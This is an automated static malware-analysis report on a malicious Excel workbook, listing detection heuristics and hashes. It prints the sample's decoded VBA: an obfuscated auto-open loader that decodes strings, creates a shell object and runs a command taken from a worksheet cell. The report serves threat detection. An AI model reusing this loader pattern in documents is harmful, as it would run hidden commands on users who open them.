Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7d856ce2b96e10fe…

MALICIOUS

Office (OLE)

45.5 KB Created: 2018-04-13 12:28:44 Authoring application: Microsoft Excel First seen: 2021-02-23
MD5: c9a696ae8418ba58359d61b61d3adf3a SHA-1: 50594ce2c9eabd6c6a01c60073f761f7e2018a6b SHA-256: 7d856ce2b96e10fef190ee959c6c3eae5aeae6e9c2994fe002ad4e8cf3253674
346 Risk Score

Heuristics 11

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Xls.Malware.Valyria-6700358-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
  • Excel 4.0 (XLM) Auto_Open + macro sheet critical OLE_XLM_AUTOOPEN
    Workbook contains an Auto_Open / Auto_Close defined name together with an Excel 4.0 macro sheet — the canonical XLM auto-execution shape used by malware families such as Emotet and QakBot.
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Application.Run ECY_CB("A7B2BCB5B9AEC1ADB3A7")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim PY_C As Object: Set PY_C = VBA.CreateObject(ECY_CB("B9B5C5D4CBD2D690B5CAC7CECE"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Public Sub Auto_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 230 bytes
SHA-256: 71a3a7a2e8cc9171c7e1df1e35a039b0c01da36784f2f7b8c3388187663fd782
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  NewDo
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9605 bytes
SHA-256: bb44e4733a14ef7c10d3c557ea42af2032cb0e5e4a13887351f8e6feb20b0f8c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 22 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Sub EPZSWL_KQE()
    HSX_V
End Sub
Public Function ECY_CB(ByVal text As String)
   Dim AXJ_NG As String
   Dim PE_Y As Long
   For PE_Y = 1 To Len(text) Step 2
        AXJ_NG = AXJ_NG & Chr(Asc(Chr("&H" & Mid(text, PE_Y, 2))) - 98)
   Next
   ECY_CB = AXJ_NG
End Function
Public Sub Auto_Open()
    Application.Run ECY_CB("A7B2BCB5B9AEC1ADB3A7")
End Sub
Public Sub Document_Open()
    Application.Run ECY_CB("A7B2BCB5B9AEC1ADB3A7")
End Sub
Public Sub HSX_V()
    Dim PY_C As Object: Set PY_C = VBA.CreateObject(ECY_CB("B9B5C5D4CBD2D690B5CAC7CECE"))
    Dim ANS_MO As String
ANS_MO = "9B787DA1D28BD2A18CA1B3A17EA16AA1A1A1DDA17CA1AEA1C6A1A1A1A19E9B6BBB68A1A1A176A178A1A1BDB0A1A1A1A5A1A8A1E1A181C2A1896EA7A1CAA177A174A1A1CFA163A1A1A192A1A1D7A174A1A1A1BDA1D39CA112A1A1D1A1A1A7A1DBADC8A17DA6B6A1A1A1A19695"
Dim B_WEV As String
B_WEV = "AEA1A1DBA1A1ACA18FCFA192C5A1A1A1A1C0A195A1A1A0697FA1AE66A1A1C0A1C7DCA1A1A1A1A162A194A1A1CDC2A2A194A1A1CD7A7AA19DA1A1A1A1A1A77083A1A1A0817CA1A1A1A1C8D1A1AF6E85A168A191AEC494A9A1A1A163A1DEA1A1D8A1D9A1A175A1B1A1CCCFA1A1"
Dim V_D As String
V_D = "A482A1A1A1A1A1A1E0A1A1A1A799A1A1698F90A1A173A1A1A1A19BA1A1A1A6D5A1A1A071A1CBA4A183A168A1A1A1A1C4A2A197AB70A1D19CB6A1AEC9A1A1A1A1A1D7C4A17DA1A1BED7A1A1DEA1A1A1A1E1A1A1A0AFA1D0A1A18FCBA17DA1BFA18B807BAD8AA9A1A1A1A180A1"
Dim OX_X As String
OX_X = "A1C8DCB1A1A17EA1A6C3A1A179CBE1BDC8BCCDA1A1A1A1A1A1A19A82A1C6DCA1A1A1ADA17C96C1CAE06DA1B9B972A176A1D4DBA1C49FA1A1A1A19AA195A1A18ED2CD7FA1A393A1656CA1A1A1A0A1D4BD6EA1A162A183D0A1A1C3A189A1A1A167A18DA1A9C1A3E1A1BAA1A1A1"
Dim H_V As String
H_V = "DCA1D0A1AEA1A1ABB1A1A1A1A1E0A1E1ACA1A1877564A1A5A1A195A1A190A17CC3A16FA179A1A194CEE14D9170A196A1C8A1A1A1A1A19FC577A183A1A1C5D3A19EAAA19593CD86CBB96AA1A166A17DC8A1A1A1CA7182A1A1A172A1A1A1A1C19CA1A1DAA1CC978DA1A1A1B1A1"
Dim JXU_VH As String
JXU_VH = "73A168A17DDAA16BD67DA1A1C7BDA18BA1A1A1A1B9A1A187ACBAA1A1A16DA1A1A1A6A1A1A16FE1929AA1A1A1A1A1A199BBA19AA1A1A1C5A1A18FA1D6A1D7A6A1A1787DD8A1D76FCD8194A180C3DCA1BE94A1A1A16F62C37F63A1A1A1A1B187A1D97F87A17DA16E16A1A1A1A1"
Dim EUA_Q As String
EUA_Q = "A1A1A1A179A166A1DEA1A1A1A1D7A5A177A1A16E8CA1A5B7A1A3B1E17275A1C8A1C8D07A8EA1A1A183A1A1A1DD667FCFA18EA1A1A1A1A1B4C092A1C8A1A1CA74A565A1698CCB7F6C99A1AEA1A1A1A186A1A1D7A1A170A1A1A1A1A194A1AEA1D49A63A1C7A123A1A1A2A0A1A1"
Dim L_SQ As String
L_SQ = "C9A1A1A1A1C5A1A1A1C5A1B79E67B0A17CAEA1C3DE7982A1A16CB8A1A695ABC27EA1A1A171A16FA1A19D898EA1A1CBA286A8A17469A1A1A1A1A1A187A192B4A182B9E1C3DD9E71A1A1A1A1A1B2DEA1BA82A1C6A16BA17A72A1A1A1D0A1A16DA199D298A1A16BA1A19ACFA198"
Dim BK_ZWR As String
BK_ZWR = "9381A1A181A5A19478A1C9B2A17BAD9AA1A186A1A1A864DAD8A1A1A19AA0DDCBBEA1A1A1A167BCA1A1A1A1BCA1A1A1D66AD1A1B3A1B5A1C2BFB7A7DB8BA1D2B4A6A1C6D86BA0A1A1A1E1A1A1A6A1A1976EA16CA16FE1A1C8A1A1766DBCA1C06AD96CA1A1A1937EA17992CB63"
Dim YAH_YGM As String
YAH_YGM = "A172D6A1A1A1A9A9A1A1A1A1D3A18792ABE1BF9C97A198A1A0A1A178A1A1A1A1B8C8A1A191A1A1C3BDDDA4BDC26C9BA1BB8EA1A0A1A1686AC4A1A1A177A19CA1C2A1A1A1A18FA1E1C6A1C1C6A1A1A18395A1A1C2C9A164A1A1A1A1A1A7A169A162AEA17FA1A187A1A1A187A1"
Dim QE_G As String
QE_G = "A1A1A1A1D2D3A1789EA169C2A1D7A1BEBCA1A1A165A1A1A1A1A1D669A1A178A1A1C5A17A6897A18FA1A1BC88A1B0A1A7A1BBAB70A1AA70A1A17FB3A1A1D6D3A1A1A192A1A1A3DFB289A16898ACDC7AD8A1A1B7A1A1BB7DA1A1AAA1A1A1A7808EA1A1A1809DE1A1A1A1A1A1A3A1B667A1A888A1A1A1D577A1A1A1A1CE94A1A16BA1A184BAA8A4A1A1A162A1A1A1ABA1A16BA181D3B2A1A16AB7A1A1AAA1"

    PY_C.Run ECY_CB(ThisWorkbook.Sheets("NewDor").Range("H215").Value), 0, True
End Sub
Sub Workbook_Open()
    Application.Run "ThisWorkbook." & ECY_CB("A7B2BCB5B9AEC1ADB3A7")
End Sub

' Processing file: /opt/analyzer/scan_staging/f63f9d2dd1f64c498e133c84f6df2b81.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 8132 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' 	FuncDefn (Sub EPZSWL_KQE())
' Line #2:
' 	ArgsCall HSX_V 0x0000 
' Line #3:
' 	EndSub 
' Line #4:
' 	FuncDefn (Public Function ECY_CB(ByVal Text As String))
' Line #5:
' 	Dim 
' 	VarDefn AXJ_NG (As String)
' Line #6:
' 	Dim 
' 	VarDefn PE_Y (As Long)
' Line #7:
' 	StartForVariable 
' 	Ld PE_Y 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Text 
' 	FnLen 
' 	LitDI2 0x0002 
' 	ForStep 
' Line #8:
' 	Ld AXJ_NG 
' 	LitStr 0x0002 "&H"
' 	Ld Text 
' 	Ld PE_Y 
' 	LitDI2 0x0002 
' 	ArgsLd Mid 0x0003 
' 	Concat 
' 	ArgsLd Chr 0x0001 
' 	ArgsLd Asc 0x0001 
' 	LitDI2 0x0062 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St AXJ_NG 
' Line #9:
' 	StartForVariable 
' 	Next 
' Line #10:
' 	Ld AXJ_NG 
' 	St ECY_CB 
' Line #11:
' 	EndFunc 
' Line #12:
' 	FuncDefn (Public Sub Auto_Open())
' Line #13:
' 	LitStr 0x0014 "A7B2BCB5B9AEC1ADB3A7"
' 	ArgsLd ECY_CB 0x0001 
' 	Ld Application 
' 	ArgsMemCall Run 0x0001 
' Line #14:
' 	EndSub 
' Line #15:
' 	FuncDefn (Public Sub Document_Open())
' Line #16:
' 	LitStr 0x0014 "A7B2BCB5B9AEC1ADB3A7"
' 	ArgsLd ECY_CB 0x0001 
' 	Ld Application 
' 	ArgsMemCall Run 0x0001 
' Line #17:
' 	EndSub 
' Line #18:
' 	FuncDefn (Public Sub HSX_V())
' Line #19:
' 	Dim 
' 	VarDefn PY_C (As Object)
' 	BoS 0x0000 
' 	SetStmt 
' 	LitStr 0x001A "B9B5C5D4CBD2D690B5CAC7CECE"
' 	ArgsLd ECY_CB 0x0001 
' 	Ld VBA 
' 	ArgsMemLd CreateObject 0x0001 
' 	Set PY_C 
' Line #20:
' 	Dim 
' 	VarDefn ANS_MO (As String)
' Line #21:
' 	LitStr 0x00D8 "9B787DA1D28BD2A18CA1B3A17EA16AA1A1A1DDA17CA1AEA1C6A1A1A1A19E9B6BBB68A1A1A176A178A1A1BDB0A1A1A1A5A1A8A1E1A181C2A1896EA7A1CAA177A174A1A1CFA163A1A1A192A1A1D7A174A1A1A1BDA1D39CA112A1A1D1A1A1A7A1DBADC8A17DA6B6A1A1A1A19695"
' 	St ANS_MO 
' Line #22:
' 	Dim 
' 	VarDefn B_WEV (As String)
' Line #23:
' 	LitStr 0x00D8 "AEA1A1DBA1A1ACA18FCFA192C5A1A1A1A1C0A195A1A1A0697FA1AE66A1A1C0A1C7DCA1A1A1A1A162A194A1A1CDC2A2A194A1A1CD7A7AA19DA1A1A1A1A1A77083A1A1A0817CA1A1A1A1C8D1A1AF6E85A168A191AEC494A9A1A1A163A1DEA1A1D8A1D9A1A175A1B1A1CCCFA1A1"
' 	St B_WEV 
' Line #24:
' 	Dim 
' 	VarDefn V_D (As String)
' Line #25:
' 	LitStr 0x00D8 "A482A1A1A1A1A1A1E0A1A1A1A799A1A1698F90A1A173A1A1A1A19BA1A1A1A6D5A1A1A071A1CBA4A183A168A1A1A1A1C4A2A197AB70A1D19CB6A1AEC9A1A1A1A1A1D7C4A17DA1A1BED7A1A1DEA1A1A1A1E1A1A1A0AFA1D0A1A18FCBA17DA1BFA18B807BAD8AA9A1A1A1A180A1"
' 	St V_D 
' Line #26:
' 	Dim 
' 	VarDefn OX_X (As String)
' Line #27:
' 	LitStr 0x00D8 "A1C8DCB1A1A17EA1A6C3A1A179CBE1BDC8BCCDA1A1A1A1A1A1A19A82A1C6DCA1A1A1ADA17C96C1CAE06DA1B9B972A176A1D4DBA1C49FA1A1A1A19AA195A1A18ED2CD7FA1A393A1656CA1A1A1A0A1D4BD6EA1A162A183D0A1A1C3A189A1A1A167A18DA1A9C1A3E1A1BAA1A1A1"
' 	St OX_X 
' Line #28:
' 	Dim 
' 	VarDefn H_V (As String)
' Line #29:
' 	LitStr 0x00D8 "DCA1D0A1AEA1A1ABB1A1A1A1A1E0A1E1ACA1A1877564A1A5A1A195A1A190A17CC3A16FA179A1A194CEE14D9170A196A1C8A1A1A1A1A19FC577A183A1A1C5D3A19EAAA19593CD86CBB96AA1A166A17DC8A1A1A1CA7182A1A1A172A1A1A1A1C19CA1A1DAA1CC978DA1A1A1B1A1"
' 	St H_V 
' Line #30:
' 	Dim 
' 	VarDefn JXU_VH (As String)
' Line #31:
' 	LitStr 0x00D8 "73A168A17DDAA16BD67DA1A1C7BDA18BA1A1A1A1B9A1A187ACBAA1A1A16DA1A1A1A6A1A1A16FE1929AA1A1A1A1A1A199BBA19AA1A1A1C5A1A18FA1D6A1D7A6A1A1787DD8A1D76FCD8194A180C3DCA1BE94A1A1A16F62C37F63A1A1A1A1B187A1D97F87A17DA16E16A1A1A1A1"
' 	St JXU_VH 
' Line #32:
' 	Dim 
' 	VarDefn EUA_Q (As String)
' Line #33:
' 	LitStr 0x00D8 "A1A1A1A179A166A1DEA1A1A1A1D7A5A177A1A16E8CA1A5B7A1A3B1E17275A1C8A1C8D07A8EA1A1A183A1A1A1DD667FCFA18EA1A1A1A1A1B4C092A1C8A1A1CA74A565A1698CCB7F6C99A1AEA1A1A1A186A1A1D7A1A170A1A1A1A1A194A1AEA1D49A63A1C7A123A1A1A2A0A1A1"
' 	St EUA_Q 
' Line #34:
' 	Dim 
' 	VarDefn L_SQ (As String)
' Line #35:
' 	LitStr 0x00D8 "C9A1A1A1A1C5A1A1A1C5A1B79E67B0A17CAEA1C3DE7982A1A16CB8A1A695ABC27EA1A1A171A16FA1A19D898EA1A1CBA286A8A17469A1A1A1A1A1A187A192B4A182B9E1C3DD9E71A1A1A1A1A1B2DEA1BA82A1C6A16BA17A72A1A1A1D0A1A16DA199D298A1A16BA1A19ACFA198"
' 	St L_SQ 
' Line #36:
' 	Dim 
' 	VarDefn BK_ZWR (As String)
' Line #37:
' 	LitStr 0x00D8 "9381A1A181A5A19478A1C9B2A17BAD9AA1A186A1A1A864DAD8A1A1A19AA0DDCBBEA1A1A1A167BCA1A1A1A1BCA1A1A1D66AD1A1B3A1B5A1C2BFB7A7DB8BA1D2B4A6A1C6D86BA0A1A1A1E1A1A1A6A1A1976EA16CA16FE1A1C8A1A1766DBCA1C06AD96CA1A1A1937EA17992CB63"
' 	St BK_ZWR 
' Line #38:
' 	Dim 
' 	VarDefn YAH_YGM (As String)
' Line #39:
' 	LitStr 0x00D8 "A172D6A1A1A1A9A9A1A1A1A1D3A18792ABE1BF9C97A198A1A0A1A178A1A1A1A1B8C8A1A191A1A1C3BDDDA4BDC26C9BA1BB8EA1A0A1A1686AC4A1A1A177A19CA1C2A1A1A1A18FA1E1C6A1C1C6A1A1A18395A1A1C2C9A164A1A1A1A1A1A7A169A162AEA17FA1A187A1A1A187A1"
' 	St YAH_YGM 
' Line #40:
' 	Dim 
' 	VarDefn QE_G (As String)
' Line #41:
' 	LitStr 0x013A "A1A1A1A1D2D3A1789EA169C2A1D7A1BEBCA1A1A165A1A1A1A1A1D669A1A178A1A1C5A17A6897A18FA1A1BC88A1B0A1A7A1BBAB70A1AA70A1A17FB3A1A1D6D3A1A1A192A1A1A3DFB289A16898ACDC7AD8A1A1B7A1A1BB7DA1A1AAA1A1A1A7808EA1A1A1809DE1A1A1A1A1A1A3A1B667A1A888A1A1A1D577A1A1A1A1CE94A1A16BA1A184BAA8A4A1A1A162A1A1A1ABA1A16BA181D3B2A1A16AB7A1A1AAA1"
' 	St QE_G 
' Line #42:
' Line #43:
' 	LitStr 0x0004 "H215"
' 	LitStr 0x0006 "NewDor"
' 	Ld ThisWorkbook 
' 	ArgsMemLd Sheets 0x0001 
' 	ArgsMemLd Range 0x0001 
' 	MemLd Value 
' 	ArgsLd ECY_CB 0x0001 
' 	LitDI2 0x0000 
' 	LitVarSpecial (True)
' 	Ld PY_C 
' 	ArgsMemCall Run 0x0003 
' Line #44:
' 	EndSub 
' Line #45:
' 	FuncDefn (Sub Workbook_Open())
' Line #46:
' 	LitStr 0x000D "ThisWorkbook."
' 	LitStr 0x0014 "A7B2BCB5B9AEC1ADB3A7"
' 	ArgsLd ECY_CB 0x0001 
' 	Concat 
' 	Ld Application 
' 	ArgsMemCall Run 0x0001 
' Line #47:
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.